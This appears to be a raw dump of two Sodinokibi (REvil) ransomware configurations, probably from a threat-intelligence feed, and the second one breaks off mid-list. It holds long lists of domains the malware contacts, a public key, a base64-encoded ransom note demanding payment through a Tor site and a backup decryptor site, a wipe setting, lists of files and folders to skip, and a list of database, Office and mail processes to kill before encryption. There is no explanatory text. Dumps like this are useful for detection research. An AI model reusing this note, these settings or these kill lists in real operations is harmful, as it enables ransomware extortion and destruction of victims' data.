hrmaschinetests.com;buffdaddyblog.com;mindfuelers.com;optigas.com;biketruck.de;envomask.com;welovecustomers.fr;andreaskildegaard.dk;haus-landliebe.de;christianscholz.de;jobscore.com;subyard.com;cincinnatiphotocompany.org;bjornvanvulpen.nl;xn--80abehgab4ak0ddz.xn--p1ai;lookandseen.com;thesilkroadny.com;eatyoveges.com;muller.nl;hospitalitytrainingsolutions.co.uk;markseymourphotography.co.uk;claudiakilian.de;2020hindsight.info;victorvictoria.com;elitkeramika-shop.com.ua;turing.academy;aceroprime.com;animalfood-online.de;leijstrom.com;kamin-somnium.de;ziliak.com;werkzeugtrolley.net;csaballoons.com;enactusnhlstenden.com;atrgroup.it;c-sprop.com;enews-qca.com;michaelfiegel.com;theatre-embellie.fr;mercadodelrio.com;adaduga.info;magrinya.net;ramirezprono.com;landgoedspica.nl;a-zpaperwork.eu;grancanariaregional.com;bridalcave.com;global-migrate.com;michal-s.co.il;omnicademy.com;holocine.de;sellthewrightway.com;magnetvisual.com;lexced.com;hostastay.com;kosten-vochtbestrijding.be;tastevirginia.com;gbk-tp1.de;oraweb.net;designimage.ae;trevi-vl.ru;futurenetworking.com;banksrl.co.za;fixx-repair.com;hotjapaneselesbian.com;afbudsrejserallinclusive.dk;breakluckrecords.com;endstarvation.com;kroophold-sjaelland.dk;heimdalbygg.no;broccolisoep.nl;uci-france.fr;fsbforsale.com;achetrabalhos.com;xn--80addfr4ahr.dp.ua;istantidigitali.com;eurethicsport.eu;alabamaroofingllc.com;biblica.com;bagaholics.in;hom-frisor.dk;devplus.be;koncept-m.ru;guohedd.com;latteswithleslie.com;mediahub.co.nz;photographycreativity.co.uk;burg-zelem.de;pokemonturkiye.com;frankgoll.com;bluemarinefoundation.com;renderbox.ch;kerstliedjeszingen.nl;operativadigital.com;physio-lang.de;annida.it;mursall.de;bescomedical.de;cc-experts.de;awaitspain.com;alpesiberie.com;piestar.com;kdbrh.com;groovedealers.ru;watchsale.biz;directique.com;kompresory-opravy.com;transifer.fr;affligemsehondenschool.be;autoteamlast.de;nrgvalue.com;duthler.nl;aslog.fr;nutriwell.com.sg;spectamarketingdigital.com.br;amco.net.au;tweedekansenloket.nl;ahgarage.com;askstaffing.com;justaroundthecornerpetsit.com;the-beauty-guides.com;sycamoregreenapts.com;latableacrepes-meaux.fr;belinda.af;solidhosting.nl;topautoinsurers.net;pvandambv.nl;forskolinslimeffect.net;pharmeko-group.com;cuadc.org;sharonalbrightdds.com;cardsandloyalty.com;tchernia-conseil.fr;opticahubertruiz.com;adterium.com;myplaywin3.com;blavait.fr;mediogiro.com.ar;ivancacu.com;kookooo.com;mazift.dk;livedeveloper.com;curtsdiscountguns.com;lyricalduniya.com;jlgraphisme.fr;creohn.de;vapiano.fr;lollachiro.com;t3brothers.com;rizplakatjaya.com;four-ways.com;polynine.com;ox-home.com;levelseven.be;raeoflightmusic.com;teutoradio.de;circuit-diagramz.com;lapponiasafaris.com;citiscapes-art.com;apogeeconseils.fr;the3-week-diet.net;brighthillgroup.com;mariannelemenestrel.com;soundseeing.net;randyabrown.com;queertube.net;eos-horlogerie.com;martha-frets-ceramics.nl;molinum.pt;qandmmusiccenter.com;explora.nl;profiz.com;ayudaespiritualtamara.com;cssp-mediation.org;collegetennis.info;mieleshopping.it;atelierkomon.com;fla.se;jobkiwi.com.ng;gratiocafeblog.wordpress.com;lifeinbreaths.com;naukaip.ru;zaczytana.com;n-newmedia.de;campusce.com;beauty-traveller.com;linkbuilding.life;bundan.com;greatofficespaces.net;ikzoekgod.be;allinonecampaign.com;radishallgood.com;bookingwheel.com;specialtyhomeservicesllc.com;alisodentalcare.com;oportowebdesign.com;whoopingcrane.com;pilotgreen.com;neonodi.be;omegamarbella.com;kiraribeaute-nani.com;newonestop.com;motocrossplace.co.uk;pubcon.com;riffenmattgarage.ch;theboardroomafrica.com;glennverschueren.be;fazagostar.co;atma.nl;lisa-poncon.fr;projektparkiet.pl;jandhpest.com;andrealuchesi.it;galaniuklaw.com;digitale-elite.de;ketomealprep.academy;cormanmarketing.com;nginx.com;fotoeditores.com;1deals.com;11.in.ua;flossmoordental.com;orchardbrickwork.com;glende-pflanzenparadies.de;alwaysdc.com;cleanroomequipment.ie;janellrardon.com;ddmgen.com;ruggestar.ch;ncn.nl;campinglaforetdetesse.com;ziliak.com;thegrinningmanmusical.com;ilveshistoria.com;customroasts.com;bluelakevision.com;oexebusiness.com;asiaartgallery.jp;vitormmcosta.com;metcalfe.ca;palmecophilippines.com;mariamalmahdi.com;hawaiisteelbuilding.com;olry-cloisons.fr;vitoriaecoturismo.com.br;bakingismyyoga.com;myfbateam.com;onesynergyinternational.com;webforsites.com;zdrowieszczecin.pl;premier-iowa.com;wordpress.idium.no;nieuwsindeklas.be;dcc-eu.com;drbrianhweeks.com;innersurrection.com;hm-com.com;test-teleachat.fr;letterscan.de;mangimirossana.it;o90.dk;mensemetgesigte.co.za;stitch-n-bitch.com;easydental.ae;ijsselbeton.nl;palmenhaus-erfurt.de;mundo-pieces-auto.fr;birthplacemag.com;fridakids.com;juergenblaetz.de;ziliak.com;sealgrinderpt.com;finnergo.eu;energosbit-rp.ru;trainiumacademy.com;epicjapanart.com;signamedia.de;profibersan.com;tellthebell.website;springfieldplumbermo.com;larchwoodmarketing.com;suitesartemis.gr;bertbutter.nl;medicalsupportco.com;molade.nl;mondolandscapes.com;alexwenzel.de;drbenveniste.com;boloria.de;aheadloftladders.co.uk;stage-infirmier.fr;dantreranch.com;citydogslife.com;johnkoen.com;sachainchiuk.com;sshomme.com;initconf.com;martinipstudios.com;skooppi.fi;catering.com;saint-malo-developpement.fr;mariajosediazdemera.com;campusescalade.com;uncensoredhentaigif.com;auto-opel.ro;dennisverschuur.com;berdonllp.com;maxcube24.com.ua;pinthelook.com;advanced-removals.co.uk;jacquesgarcianoto.com;ced-elec.com;sochi-okna23.ru;pansionatblago.ru;malevannye.ru;banukumbak.com;rozmata.com;fascaonline.com;bcmets.info;mslp.org;perfectgrin.com;tramadolhealth.com;clinic-beethovenstrasse-ag.ch;skyscanner.ro;bodymindchallenger.com;rokthetalk.com;furland.ru;datatri.be;traitware.com;chorusconsulting.net;akwaba-safaris.com;avis.mantova.it;thepixelfairy.com;patassociation.com;factorywizuk.com;muni.pe;manzel.tn;iron-mine.ru;julielusktherapy.com;3daywebs.com;weddingceremonieswithtim.com;onlinetvgroup.com;billyoart.com;colored-shelves.com;tzn.nu;annenymus.com;xtensifi.com;finsahome.co.uk;narca.net;prodentalblue.com;centuryvisionglobal.com;hawthornsretirement.co.uk;wyreforest.net;simpleitsolutions.ch;foerderverein-vatterschule.de;reygroup.pt;ideamode.com;lashandbrowenvy.com;tutvracks.com;thestudio.academy;stanleyqualitysystems.com;ledyoucan.com;entdoctor-durban.com;goeppinger-teppichreinigung.de;parksideseniorliving.net;aciscomputers.com;cascinarosa33.it;apmollerpension.com;triplettabordeaux.fr;cymru.futbol;miscbo.it;licensed-public-adjuster.com;arabianmice.com;speakaudible.com;littlesaints.academy;nourella.com;deziplan.ru;hostingbangladesh.net;frameshift.it;protoplay.ca;min-virksomhed.dk;direitapernambuco.com;harleystreetspineclinic.com;redpebblephotography.com;beandrivingschool.com.au;stathmoulis.gr;happycatering.de;netadultere.fr;mustangmarketinggroup.com;evsynthacademy.org;m2graph.fr;site.markkit.com.br;arazi.eus;stressreliefadvice.com;internestdigital.com;wasnederland.nl;domilivefurniture.com;der-stempelking.de;5thactors.com;hoteltantra.com;boyfriendsgoal.site;bendel-partner.de;paradigmlandscape.com;nexstagefinancial.com;zinnystar.com;professionetata.com;happylublog.wordpress.com;moira-cristescu.com;rhino-storage.co.uk;carsten.sparen-it.de;die-immo-agentur.de;nalliasmali.net;lovcase.com;factoriareloj.com;sweetz.fr;bodet150ans.com;qwikcoach.com;schroederschoembs.com;tages-geldvergleich.de;glas-kuck.de;fotoslubna.com;azerbaycanas.com;bohrlochversicherung.info;laaisterplakky.nl;production-stills.co.uk;scotlandsroute66.co.uk;shrinkingplanet.com;agendatwentytwenty.com;spirello.nl;singletonfinancial.com;kryddersnapsen.dk;girlish.ae;levencovka.ru;nationnewsroom.com;santastoy.store;cp-bap.de;ocduiblog.com;andermattswisswatches.ch;pinkxgayvideoawards.com;descargandoprogramas.com;apiarista.de;5pointpt.com;lgiwines.com;rossomattonecase.it;powershell.su;premiumweb.com.ua:443;oro.ae;ikadomus.com;ygallerysalonsoho.com:443;ronielyn.com;brisbaneosteopathic.com.au;pourlabretagne.bzh;metroton.ru;richardiv.com;putzen-reinigen.com;metriplica.academy;fitnessblenderstory.com;lassocrm.com;hensleymarketing.com;b3b.ch;louiedager.com;yvesdoin-aquarelles.fr;nicksrock.com;log-barn.co.uk;scentedlair.com;xrresources.com;promus.ca;logosindustries.com;airvapourbarrier.com;sppdstats.com;rhino-turf.com;catchup-mag.com;noda.com.ua;motocrosshideout.com;fta-media.com;tbalp.co.uk;brunoimmobilier.com;valiant-voice.com;leopoldineroux.com;loysonbryan.com;schulz-moelln.de;geoweb.software;eksperdanismanlik.com;artcase.pl;tatyanakopieva.ru;jdscenter.com;ruggestar.ch;elex.is;tilldeeke.de;ncjc.ca;framemyballs.com;alltagsrassismus-entknoten.de;christopherhannan.com;yuanshenghotel.com;prometeyagro.com.ua;albcleaner.fr;smartmind.net;xn--ziinoapte-6ld.ro;gosouldeep.com;reizenmetkinderen.be;mrmac.com;airserviceunlimited.com;globalskills.pt;nuohous.com;gsconcretecoatings.com;ykobbqchicken.ca;yourcosmicbeing.com;greenrider.nl;internalresults.com;subquercy.fr;liverpoolabudhabi.ae;the5thquestion.com;osn.ro;tanatek.com;nepressurecleaning.com;universelle.fr;jameswilliamspainting.com;nxtstg.org;elliemaccreative.wordpress.com;witraz.pl;rechtenplicht.be;agriturismocastagneto.it;antesacademy.it;encounter-p.net;primemarineengineering.com;sveneulberg.de;texanscan.org;sarahspics.co.uk;rename.kz;leloupblanc.gr;ceocenters.com;perceptdecor.com;luvbec.com;salonlamar.nl;kvetymichalovce.sk;qrs-international.com;janasfokus.com;topvijesti.net;worldproskitour.com;wineandgo.hu;hameghlim.com;line-x.co.uk;mikegoodfellow.co.uk;tradenavigator.ch;indiebizadvocates.org;rvside.com;clemenfoto.dk;stabilisateur.fr;belofloripa.be;tecleados.com;bd2fly.com;gardenpartner.pl;hvitfeldt.dk;teamsegeln.ch;angelika-schwarz.com;suonenjoen.fi;kartuindonesia.com;startuplive.org;parseport.com;agenceassemble.fr;altitudeboise.com;egpu.fr;anleggsregisteret.no;bellesiniacademy.org;sjtpo.org;kafkacare.com;adedesign.com;haard-totaal.nl;saberconcrete.com;rishigangoly.com;alattekniksipil.com;vdolg24.online;dentourage.com;billscars.net;devus.de;dogsunlimitedguide.com;dentalcircle.com;astrographic.com;wademurray.com;bourchier.org;alene.co;bruut.online;jaaphoekzema.nl;limounie.com;slideevents.be;mind2muscle.nl;hypogenforensic.com;cainlaw-okc.com;mbuildinghomes.com;carmel-york.com;edvestors.org;unislaw-narty.pl;from02pro.com;cotton-avenue.co.il;speiserei-hannover.de;dierenambulancealkmaar.nl;slotenmakerszwijndrecht.nl;interlinkone.com;breathebettertolivebetter.com;triplettagaite.fr;itheroes.dk;bringmehope.org;ya-elka.ru;advancedeyecare.com;ebible.co;bg.szczecin.pl;solutionshosting.co.uk;skidpiping.de;mediabolmong.com;vipcarrental.ae;zorgboerderijravensbosch.nl;luvinsburger.fr;altocontatto.net;leatherjees.com;masecologicos.com;kristianboennelykke.dk;teethinadaydentalimplants.com;phukienbepthanhdat.com", "net": true, "nbody": "LQAtAC0APQA9AD0AIABXAGUAbABjAG8AbQBlAC4AIABBAGcAYQBpAG4ALgAgAD0APQA9AC0ALQAtAA0ACgANAAoAWwArAF0AIABXAGgAYQB0AHMAIABIAGEAcABwAGUAbgA/ACAAWwArAF0ADQAKAA0ACgBZAG8AdQByACAAZgBpAGwAZQBzACAAYQByAGUAIABlAG4AYwByAHkAcAB0AGUAZAAsACAAYQBuAGQAIABjAHUAcgByAGUAbgB0AGwAeQAgAHUAbgBhAHYAYQBpAGwAYQBiAGwAZQAuACAAWQBvAHUAIABjAGEAbgAgAGMAaABlAGMAawAgAGkAdAA6ACAAYQBsAGwAIABmAGkAbABlAHMAIABvAG4AIAB5AG8AdQAgAGMAbwBtAHAAdQB0AGUAcgAgAGgAYQBzACAAZQB4AHAAYQBuAHMAaQBvAG4AIAB7AEUAWABUAH0ALgANAAoAQgB5ACAAdABoAGUAIAB3AGEAeQAsACAAZQB2AGUAcgB5AHQAaABpAG4AZwAgAGkAcwAgAHAAbwBzAHMAaQBiAGwAZQAgAHQAbwAgAHIAZQBjAG8AdgBlAHIAIAAoAHIAZQBzAHQAbwByAGUAKQAsACAAYgB1AHQAIAB5AG8AdQAgAG4AZQBlAGQAIAB0AG8AIABmAG8AbABsAG8AdwAgAG8AdQByACAAaQBuAHMAdAByAHUAYwB0AGkAbwBuAHMALgAgAE8AdABoAGUAcgB3AGkAcwBlACwAIAB5AG8AdQAgAGMAYQBuAHQAIAByAGUAdAB1AHIAbgAgAHkAbwB1AHIAIABkAGEAdABhACAAKABOAEUAVgBFAFIAKQAuAA0ACgANAAoAWwArAF0AIABXAGgAYQB0ACAAZwB1AGEAcgBhAG4AdABlAGUAcwA/ACAAWwArAF0ADQAKAA0ACgBJAHQAcwAgAGoAdQBzAHQAIABhACAAYgB1AHMAaQBuAGUAcwBzAC4AIABXAGUAIABhAGIAcwBvAGwAdQB0AGUAbAB5ACAAZABvACAAbgBvAHQAIABjAGEAcgBlACAAYQBiAG8AdQB0ACAAeQBvAHUAIABhAG4AZAAgAHkAbwB1AHIAIABkAGUAYQBsAHMALAAgAGUAeABjAGUAcAB0ACAAZwBlAHQAdABpAG4AZwAgAGIAZQBuAGUAZgBpAHQAcwAuACAASQBmACAAdwBlACAAZABvACAAbgBvAHQAIABkAG8AIABvAHUAcgAgAHcAbwByAGsAIABhAG4AZAAgAGwAaQBhAGIAaQBsAGkAdABpAGUAcwAgAC0AIABuAG8AYgBvAGQAeQAgAHcAaQBsAGwAIABuAG8AdAAgAGMAbwBvAHAAZQByAGEAdABlACAAdwBpAHQAaAAgAHUAcwAuACAASQB0AHMAIABuAG8AdAAgAGkAbgAgAG8AdQByACAAaQBuAHQAZQByAGUAcwB0AHMALgANAAoAVABvACAAYwBoAGUAYwBrACAAdABoAGUAIABhAGIAaQBsAGkAdAB5ACAAbwBmACAAcgBlAHQAdQByAG4AaQBuAGcAIABmAGkAbABlAHMALAAgAFkAbwB1ACAAcwBoAG8AdQBsAGQAIABnAG8AIAB0AG8AIABvAHUAcgAgAHcAZQBiAHMAaQB0AGUALgAgAFQAaABlAHIAZQAgAHkAbwB1ACAAYwBhAG4AIABkAGUAYwByAHkAcAB0ACAAbwBuAGUAIABmAGkAbABlACAAZgBvAHIAIABmAHIAZQBlAC4AIABUAGgAYQB0ACAAaQBzACAAbwB1AHIAIABnAHUAYQByAGEAbgB0AGUAZQAuAA0ACgBJAGYAIAB5AG8AdQAgAHcAaQBsAGwAIABuAG8AdAAgAGMAbwBvAHAAZQByAGEAdABlACAAdwBpAHQAaAAgAG8AdQByACAAcwBlAHIAdgBpAGMAZQAgAC0AIABmAG8AcgAgAHUAcwAsACAAaQB0AHMAIABkAG8AZQBzACAAbgBvAHQAIABtAGEAdAB0AGUAcgAuACAAQgB1AHQAIAB5AG8AdQAgAHcAaQBsAGwAIABsAG8AcwBlACAAeQBvAHUAcgAgAHQAaQBtAGUAIABhAG4AZAAgAGQAYQB0AGEALAAgAGMAYQB1AHMAZQAgAGoAdQBzAHQAIAB3AGUAIABoAGEAdgBlACAAdABoAGUAIABwAHIAaQB2AGEAdABlACAAawBlAHkALgAgAEkAbgAgAHAAcgBhAGMAdABpAHMAZQAgAC0AIAB0AGkAbQBlACAAaQBzACAAbQB1AGMAaAAgAG0AbwByAGUAIAB2AGEAbAB1AGEAYgBsAGUAIAB0AGgAYQBuACAAbQBvAG4AZQB5AC4ADQAKAA0ACgBbACsAXQAgAEgAbwB3ACAAdABvACAAZwBlAHQAIABhAGMAYwBlAHMAcwAgAG8AbgAgAHcAZQBiAHMAaQB0AGUAPwAgAFsAKwBdAA0ACgANAAoAWQBvAHUAIABoAGEAdgBlACAAdAB3AG8AIAB3AGEAeQBzADoADQAKAA0ACgAxACkAIABbAFIAZQBjAG8AbQBtAGUAbgBkAGUAZABdACAAVQBzAGkAbgBnACAAYQAgAFQATwBSACAAYgByAG8AdwBzAGUAcgAhAA0ACgAgACAAYQApACAARABvAHcAbgBsAG8AYQBkACAAYQBuAGQAIABpAG4AcwB0AGEAbABsACAAVABPAFIAIABiAHIAbwB3AHMAZQByACAAZgByAG8AbQAgAHQAaABpAHMAIABzAGkAdABlADoAIABoAHQAdABwAHMAOgAvAC8AdABvAHIAcAByAG8AagBlAGMAdAAuAG8AcgBnAC8ADQAKACAAIABiACkAIABPAHAAZQBuACAAbwB1AHIAIAB3AGUAYgBzAGkAdABlADoAIABoAHQAdABwADoALwAvAGEAcABsAGUAYgB6AHUANAA3AHcAZwBhAHoAYQBwAGQAcQBrAHMANgB2AHIAYwB2ADYAegBjAG4AagBwAHAAawBiAHgAYgByADYAdwBrAGUAdABmADUANgBuAGYANgBhAHEAMgBuAG0AeQBvAHkAZAAuAG8AbgBpAG8AbgAvAHsAVQBJAEQAfQANAAoADQAKADIAKQAgAEkAZgAgAFQATwBSACAAYgBsAG8AYwBrAGUAZAAgAGkAbgAgAHkAbwB1AHIAIABjAG8AdQBuAHQAcgB5ACwAIAB0AHIAeQAgAHQAbwAgAHUAcwBlACAAVgBQAE4AIQAgAEIAdQB0ACAAeQBvAHUAIABjAGEAbgAgAHUAcwBlACAAbwB1AHIAIABzAGUAYwBvAG4AZABhAHIAeQAgAHcAZQBiAHMAaQB0AGUALgAgAEYAbwByACAAdABoAGkAcwA6AA0ACgAgACAAYQApACAATwBwAGUAbgAgAHkAbwB1AHIAIABhAG4AeQAgAGIAcgBvAHcAcwBlAHIAIAAoAEMAaAByAG8AbQBlACwAIABGAGkAcgBlAGYAbwB4ACwAIABPAHAAZQByAGEALAAgAEkARQAsACAARQBkAGcAZQApAA0ACgAgACAAYgApACAATwBwAGUAbgAgAG8AdQByACAAcwBlAGMAbwBuAGQAYQByAHkAIAB3AGUAYgBzAGkAdABlADoAIABoAHQAdABwADoALwAvAGQAZQBjAHIAeQBwAHQAbwByAC4AdABvAHAALwB7AFUASQBEAH0ADQAKAA0ACgBXAGEAcgBuAGkAbgBnADoAIABzAGUAYwBvAG4AZABhAHIAeQAgAHcAZQBiAHMAaQB0AGUAIABjAGEAbgAgAGIAZQAgAGIAbABvAGMAawBlAGQALAAgAHQAaABhAHQAcwAgAHcAaAB5ACAAZgBpAHIAcwB0ACAAdgBhAHIAaQBhAG4AdAAgAG0AdQBjAGgAIABiAGUAdAB0AGUAcgAgAGEAbgBkACAAbQBvAHIAZQAgAGEAdgBhAGkAbABhAGIAbABlAC4ADQAKAA0ACgBXAGgAZQBuACAAeQBvAHUAIABvAHAAZQBuACAAbwB1AHIAIAB3AGUAYgBzAGkAdABlACwAIABwAHUAdAAgAHQAaABlACAAZgBvAGwAbABvAHcAaQBuAGcAIABkAGEAdABhACAAaQBuACAAdABoAGUAIABpAG4AcAB1AHQAIABmAG8AcgBtADoADQAKAEsAZQB5ADoADQAKAA0ACgB7AEsARQBZAH0ADQAKAA0ACgANAAoARQB4AHQAZQBuAHMAaQBvAG4AIABuAGEAbQBlADoADQAKAA0ACgB7AEUAWABUAH0ADQAKAA0ACgAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ADQAKAA0ACgAhACEAIQAgAEQAQQBOAEcARQBSACAAIQAhACEADQAKAEQATwBOAFQAIAB0AHIAeQAgAHQAbwAgAGMAaABhAG4AZwBlACAAZgBpAGwAZQBzACAAYgB5ACAAeQBvAHUAcgBzAGUAbABmACwAIABEAE8ATgBUACAAdQBzAGUAIABhAG4AeQAgAHQAaABpAHIAZAAgAHAAYQByAHQAeQAgAHMAbwBmAHQAdwBhAHIAZQAgAGYAbwByACAAcgBlAHMAdABvAHIAaQBuAGcAIAB5AG8AdQByACAAZABhAHQAYQAgAG8AcgAgAGEAbgB0AGkAdgBpAHIAdQBzACAAcwBvAGwAdQB0AGkAbwBuAHMAIAAtACAAaQB0AHMAIABtAGEAeQAgAGUAbgB0AGEAaQBsACAAZABhAG0AZwBlACAAbwBmACAAdABoAGUAIABwAHIAaQB2AGEAdABlACAAawBlAHkAIABhAG4AZAAsACAAYQBzACAAcgBlAHMAdQBsAHQALAAgAFQAaABlACAATABvAHMAcwAgAGEAbABsACAAZABhAHQAYQAuAA0ACgAhACEAIQAgACEAIQAhACAAIQAhACEADQAKAE8ATgBFACAATQBPAFIARQAgAFQASQBNAEUAOgAgAEkAdABzACAAaQBuACAAeQBvAHUAcgAgAGkAbgB0AGUAcgBlAHMAdABzACAAdABvACAAZwBlAHQAIAB5AG8AdQByACAAZgBpAGwAZQBzACAAYgBhAGMAawAuACAARgByAG8AbQAgAG8AdQByACAAcwBpAGQAZQAsACAAdwBlACAAKAB0AGgAZQAgAGIAZQBzAHQAIABzAHAAZQBjAGkAYQBsAGkAcwB0AHMAKQAgAG0AYQBrAGUAIABlAHYAZQByAHkAdABoAGkAbgBnACAAZgBvAHIAIAByAGUAcwB0AG8AcgBpAG4AZwAsACAAYgB1AHQAIABwAGwAZQBhAHMAZQAgAHMAaABvAHUAbABkACAAbgBvAHQAIABpAG4AdABlAHIAZgBlAHIAZQAuAA0ACgAhACEAIQAgACEAIQAhACAAIQAhACEAAAA=", "nname": "{EXT}-readme.txt", "exp": false, "img": "QQBsAGwAIABvAGYAIAB5AG8AdQByACAAZgBpAGwAZQBzACAAYQByAGUAIABlAG4AYwByAHkAcAB0AGUAZAAhAA0ACgANAAoARgBpAG4AZAAgAHsARQBYAFQAfQAtAHIAZQBhAGQAbQBlAC4AdAB4AHQAIABhAG4AZAAgAGYAbwBsAGwAbwB3ACAAaQBuAHMAdAB1AGMAdABpAG8AbgBzAAAA"}

Threatname: Sodinokibi

{"pk": "N9tiPqA45L8cXACRHlBdJFayV8M5MEF4JjppDRO+oHU=", "pid": "30", "sub": "113", "dbg": false, "fast": true, "wipe": true, "wht": {"fld": ["perflogs", "$windows.~ws", "system volume information", "google", "programdata", "appdata", "windows.old", "windows", "intel", "program files", "application data", "msocache", "mozilla", "$windows.~bt", "boot", "$recycle.bin", "tor browser", "program files (x86)"], "fls": ["ntuser.ini", "thumbs.db", "ntuser.dat", "autorun.inf", "ntldr", "ntuser.dat.log", "bootsect.bak", "boot.ini", "iconcache.db", "bootfont.bin", "desktop.ini"], "ext": ["cpl", "cmd", "diagpkg", "adv", "mod", "ico", "deskthemepack", "msi", "ani", "cab", "theme", "scr", "hlp", "com", "prf", "msp", "exe", "mpa", "diagcab", "key", "386", "hta", "ps1", "nls", "drv", "cur", "dll", "diagcfg", "icl", "bin", "spl", "msc", "lnk", "rom", "bat", "lock", "themepack", "ldf", "nomedia", "msstyles", "rtp", "sys", "msu", "icns", "shs", "ocx", "idx", "wpx", "ics"]}, "wfld": ["backup"], "prc": ["thebat64.exe", "dbsnmp.exe", "mydesktopqos.exe", "wordpad.exe", "sqlwriter.exe", "agntsvc.exe", "winword.exe", "mysqld.exe", "excel.exe", "mysqld_nt.exe", "msaccess.exe", "sqlbrowser.exe", "isqlplussvc.exe", "encsvc.exe", "steam.exe", "infopath.exe", "sqlservr.exe", "oracle.exe", "sqbcoreservice.exe", "thebat.exe", "firefoxconfig.exe", "ocomm.exe", "mydesktopservice.exe", "tbirdconfig.exe", "msftesql.exe", "thunderbird.exe", "onenote.exe", "mspub.exe", "xfssvccon.exe", "dbeng50.exe", "ocautoupds.exe", "visio.exe", "sqlagent.exe", "powerpnt.exe", "synctime.exe", "ocssd.exe", "mysqld_opt.exe", "outlook.exe"], "dmn": "p-ride.live;avtoboss163.ru:443;rarefoods.ro;brownswoodblog.com;patriotcleaning.net;so-sage.fr;katherinealy.com;innovationgames-brabant.nl;eshop.design;drvoip.com;liepertgrafikweb.at;rino-gmbh.com;monstarrsoccer.com;thenalpa.com;thiagoperez.com;fskhjalmar.se;eafx.pro;oncarrot.com;axisoflove.org:443;aquacheck.co.za;bajova.sk;innovationgames-brabant.nl;charlottelhanna.com;ilovefullcircle.com;dnqa.co.uk;catalyseurdetransformation.com;imajyuku-sozoku.com;kelsigordon.com;handyman-silkeborg.dk;pxsrl.it;poems-for-the-soul.ch;jimprattmediations.com;gaearoyals.com;advance-refle.com;pixelhealth.net;electricianul.com;unexplored.gr;look.academy;endlessrealms.net;bonitabeachassociation.com;pro-gamer.pl;donau-guides.eu;9nar.com;hartofurniture.com;silverbird.dk;smartercashsystem.com;pedmanson.com;publicompserver.de;georgemuncey.com;delegationhub.com;kenmccallum.com;rentingwell.com;animation-pro.co.uk;diakonie-weitramsdorf-sesslach.de;hiddensee-buhne11.de;expohomes.com;laylavalentine.com;quitescorting.com;pisofare.co;babysitting-hk.helpergo.co;johnsonweekly.com;jglconsultancy.com;barbaramcfadyenjewelry.com;alnectus.com;matthieupetel.fr;sber-biznes.com;supercarhire.co.uk;sunsolutions.es;the-cupboard.co.uk;computer-place.de;jobstomoveamerica.org;testitjavertailut.net;go.labibini.ch;funworx.de;chatterchatterchatter.com;lsngroupe.com;iexpert99.com;espaciopolitica.com;skinkeeper.li;cookinn.nl;zuerich-umzug.ch;toranjtuition.org;fidelitytitleoregon.com;pankiss.ru;amyandzac.com;janmorgenstern.com;keyboardjournal.com;fire-space.com;grafikstudio-visuell.de;ufovidmag.com;corporacionrr.com;jeanmonti.com;baptistdistinctives.org;jalkapuu.net;placermonticello.com;unboxtherapy.site;jollity.hu;housesofwa.com;sbit.ag;drnelsonpediatrics.com;grupoexin10.com;klapanvent.ru;davedavisphotos.com;pajagus.fr;spartamovers.com;etgdogz.de;legundschiess.de;soncini.ch;cmeow.com;111firstdelray.com;tieronechic.com;lesyeuxbleus.net;kickittickets.com;awag-blog.de;skolaprome.eu;graygreenbiomedservices.com;concontactodirecto.com;block-optic.com;golfclublandgoednieuwkerk.nl;auberives-sur-vareze.fr;casinodepositors.com;kausette.com;acibademmobil.com.tr;diverfiestas.com.es;skoczynski.eu;paprikapod.com;jlwilsonbooks.com;baikalflot.ru;dayenne-styling.nl;rs-danmark.dk;hnkns.com;kemtron.fr;husetsanitas.dk;dentallabor-luenen.de;oththukaruva.com;baita.ac;aktivfriskcenter.se;iactechnologies.net;hotelturbo.de;encounter-p.net;signededenroth.dk;fi-institutionalfunds.com;floweringsun.org;rentsportsequip.com;abulanov.com;web865.com;nbva.co.uk;mneti.ru;xn--billigafrgpatroner-stb.se;wirmuessenreden.com;bilius.dk;wrinstitute.org;karmeliterviertel.com;smartspeak.com;blucamp.com;jakubrybak.com;phoenixcrane.com;billigeflybilletter.dk;rsidesigns.com;hinotruckwreckers.com.au;cxcompany.com;yayasanprimaunggul.org;deduktia.fi;matteoruzzaofficial.com;volta.plus;eastgrinsteadwingchun.com;livelai.com;betterce.com;veggienessa.com;buzzneakers.com;stralsund-ansichten.de;leansupremegarcinia.net;invela.dk;cac2040.com;lagschools.ng;ciga-france.fr;gta-jjb.fr;buonabitare.com;wallflowersandrakes.com;mamajenedesigns.com;mahikuchen.com;dr-vita.de;renehartman.nl;basindentistry.com;mrkluttz.com;angelsmirrorus.com;yournextshoes.com;eyedoctordallas.com;nepal-pictures.com;plbinsurance.com;triavlete.com;switch-made.com;innervisions-id.com;mac-computer-support-hamburg.de;dinedrinkdetroit.com;scholarquotes.com;pazarspor.org.tr;gurutechnologies.net;otpusk.zp.ua;alharsunindo.com;chainofhopeeurope.eu;walterman.es;adabible.org;theintellect.edu.pk;alcye.com;peppergreenfarmcatering.com.au;mesajjongeren.nl;reputation-medical.online;redctei.co;kuriero.pro;limmortelyouth.com;napisat-pismo-gubernatoru.ru:443;awaisghauri.com;loparnille.se;sololibrerie.it;aberdeenartwalk.org;biodentify.ai;bmw-i-pure-impulse.com;wg-heiligenstadt.de;letsstopsmoking.co.uk;fann.ru;cmascd.com;precisetemp.com;parisschool.ru;zealcon.ae;smartworkplaza.com;druktemakersheerenveen.nl;racefietsenblog.nl;lidkopingsnytt.nu;onlinemarketingsurgery.co.uk;shortsalemap.com;sytzedevries.com;stagefxinc.com;advesa.com;therapybusinessacademy.com;voice2biz.com;lovetzuchia.com;bcabattoirs.org;coachpreneuracademy.com;vvego.com;daveystownhouse.com;proffteplo.com;dmlcpa.com;humanviruses.org;benchbiz.com;alaskaremote.com;penumbuhrambutkeiskei.com;jonnyhooley.com;lunoluno.com;domaine-des-pothiers.com;theater-lueneburg.de;neolaiamedispa.com;mazzaropi.com.br;richardkershawwines.co.za;chatberlin.de;ludoil.it;rtc24.com;relevantonline.eu;hekecrm.com;insane.agency;leadforensics.com;distrifresh.com;morgansconsult.com;kryptos72.com;secrets-clubs.co.uk;slotspinner.com;chinowarehousespace.com;agora-collectivites.com;liveyourheartout.co;denhaagfoodie.nl;baumfinancialservices.com;k-v-f.de;lattalvor.com;akcadagofis.com;frimec-international.es;activeterroristwarningcompany.com;craftron.com;purepreprod4.com;schluesseldienste-hannover.de;ronaldhendriks.nl;brinkdoepke.eu;u